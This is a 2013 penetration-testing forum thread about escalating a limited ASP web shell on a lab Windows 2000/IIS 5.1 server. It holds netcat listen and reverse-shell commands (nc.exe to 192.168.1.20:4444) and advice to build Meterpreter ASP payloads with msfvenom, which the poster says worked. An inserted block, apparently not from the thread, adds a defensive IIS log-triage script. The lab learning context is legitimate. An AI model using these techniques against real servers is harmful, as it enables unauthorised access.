Author Topic: Limited shell  (Read 3075 times)
H1t M0nk3y
« on: January 16, 2013, 08:45:05 AM »

Ok, here's another problem I have had for way too long now and I want to fix.

Here's the scenario: I have got a limited shell on a server in a lab through a web application vulnerability.

By "limited shell", I mean:
- The shell doesn't give me any output on the screen and I cannot output results of commands in a file
- I can change directory and list files (using a second ASP shell), but that's about it.
- I am able to ftp files/modify files into the web root directory (for example, I have uploaded nc.exe in C:\inetpub\wwwroot)

So for example:
C:\Windows\system32>cd ../..     (works)
C:\>cd inetpub\wwwroot    (works)
C:\inetpub\wwwroot> dir    (doesn't display anything)
C:\inetpub\wwwroot> dir > files.txt    (doesn't create a file)
C:\inetpub\wwwroot> nc.exe -lvp 4444    (doesn't work)
C:\inetpub\wwwroot> nc.exe -v 192.168.1.20 4444    (doesn't work either)

I have tried 5 or 6 different ASP shells, but couldn't get much more out of it.

So what approach should I take at this point? Write my own ASP shell code? Focus on trying to get a full shell (for example, using netcat somehow)? Maybe priv escalation (I don't think so at this point, but I could be wrong)

I really just need a direction so I can continue working on a solution...

Thanks


OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
ziggy_567
« Reply #1 on: January 16, 2013, 08:56:01 AM »

The link below is Linux specific, but there's quite a bit that could be adapted to Windows.

http://pen-testing.sans.org/blog/pen-testing/2012/06/06/escaping-restricted-linux-shells

Also, maybe something in there will click for you and give you some further avenues to explore.

Good luck!

--
Ziggy


eCPPT - GSEC - GCIH - GCUX - RHCE - SCSecA - Security+ - Network+
Dark_Knight
« Reply #2 on: January 16, 2013, 09:26:00 AM »

Are you able to run "net" commands for "net user" etc?

CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
H1t M0nk3y
« Reply #3 on: January 16, 2013, 09:31:53 AM »

Thanks ziggy_567, I will be reading this tonight!!


Quote
Are you able to run "net" commands for "net user" etc?
No, it doesn't work either...

The IIS server is run with a pretty limited user...
ajohnson
aka dynamik
« Reply #4 on: January 16, 2013, 10:20:07 AM »

What shells are you trying to use? What OS and version of IIS are you using?

I've encountered instances where I can blindly execute commands, but I can't think of a time where I was using a web shell and wasn't able to receive output for non-privileged commands.

Here's another collection of shells you might want to try: http://laudanum.inguardians.com/ I'm pretty sure there is at least one ASP-based shell in there.

WIP: GCFA | www.infosiege.net | @infosiege

The day you stop learning is the day you start becoming obsolete.
H1t M0nk3y
« Reply #5 on: January 16, 2013, 11:57:16 AM »

Quote
What shells are you trying to use? What OS and version of IIS are you using?
Microsoft Windows 2000 SP4
Microsoft IIS httpd 5.1
Using ASPshell and zephir4 (tried 3 or 4 others that I don't remember)

But I am not really looking for help to debug this problem. I am more looking at a methodology or links with tricks I could try.

I have already tried something like 25 different tricks (not all listed here, obviously), but I would like to learn a few other ones.

I might write my own ASP shell code tonight or modify an existing one...

ajohnson
« Reply #6 on: January 16, 2013, 10:34:44 PM »

Methodology-wise, I'd skip the fancy shells and just see if a basic script works. Something like executing the value of a GET variable called cmd and outputting it to the screen. The web service account should at least be able to output a directory listing. If not, there may be something else quirky going on.
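The basic "cmd parameter in, output back" shell described in the reply above also leaves a clear trace in IIS logs. As an added example (not code from the thread or from any poster), here is a defender-side triage script that parses W3C extended log lines and flags requests carrying a command parameter to an ASP page, and executables such as nc.exe served straight out of the web root. The log lines, the parameter list and the extension list are constructed assumptions for illustration.

```python
# Constructed sample IIS W3C extended log lines (not taken from the thread).
# The requests mirror the thread's scenario: an uploaded ASP page driven by a
# "cmd" query parameter, plus nc.exe fetched straight from the web root.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.1
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2013-01-16 08:40:01 192.168.1.20 GET /default.asp - 200
2013-01-16 08:41:12 192.168.1.20 GET /shell.asp cmd=dir 200
2013-01-16 08:42:30 192.168.1.20 GET /shell.asp cmd=nc.exe+-v+192.168.1.20+4444 200
2013-01-16 08:43:05 192.168.1.20 GET /nc.exe - 200
2013-01-16 08:45:00 192.168.1.20 GET /images/logo.gif - 304
"""

# Query parameter names commonly used to pass a command to a one-line web
# shell (assumed list; tune it to your environment).
COMMAND_PARAMS = {"cmd", "command", "exec", "c"}
# Executables that have no business being served out of an IIS web root.
EXECUTABLE_EXT = (".exe", ".bat", ".vbs", ".com")


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the #Fields names."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows


def flag_webshell_activity(rows):
    """Return (time, reason, stem, query) tuples for requests worth triage."""
    hits = []
    for r in rows:
        stem, query = r["cs-uri-stem"].lower(), r["cs-uri-query"]
        names = set()
        if query != "-":
            names = {kv.split("=", 1)[0].lower() for kv in query.split("&")}
        if stem.endswith(".asp") and names & COMMAND_PARAMS:
            hits.append((r["time"], "command parameter sent to ASP page", stem, query))
        if stem.endswith(EXECUTABLE_EXT):
            hits.append((r["time"], "executable served from web root", stem, query))
    return hits


if __name__ == "__main__":
    for hit in flag_webshell_activity(parse_w3c(SAMPLE_LOG)):
        print(" | ".join(hit))
```

Pair the log check with a file-integrity baseline of the web root, since the thread's scenario starts with a new .asp file and nc.exe appearing in C:\inetpub\wwwroot.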
ajohnson
« Reply #7 on: January 17, 2013, 09:20:43 AM »

Also, remember that you can use msfpayload/msfencode or msfvenom to create asp files that contain Meterpreter, reverse shells, etc.
H1t M0nk3y
« Reply #8 on: January 17, 2013, 10:16:43 AM »

I didn't know that.
I will play with this later today.

Thanks ajohnson
ajohnson
« Reply #9 on: January 17, 2013, 10:33:07 AM »

This tutorial uses WebDAV as the delivery mechanism, but shows how to create the asp file, which works regardless of how you get it up to the web server: http://carnal0wnage.attackresearch.com/2010/05/more-with-metasploit-and-webdav.html
H1t M0nk3y
« Reply #10 on: January 17, 2013, 12:12:10 PM »

I appreciate it ajohnson. Thanks
H1t M0nk3y
« Reply #11 on: January 18, 2013, 11:09:43 AM »

As an update, the Meterpreter as an ASP payload did the trick.

Other useful information related to this subject:
http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,9169.0/
http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,5966.msg31666/#msg31666
http://www.room362.com/blog/2012/8/25/post-exploitation-command-lists-request-to-edit.html

Thanks again!
© 2013 The Ethical Hacker Network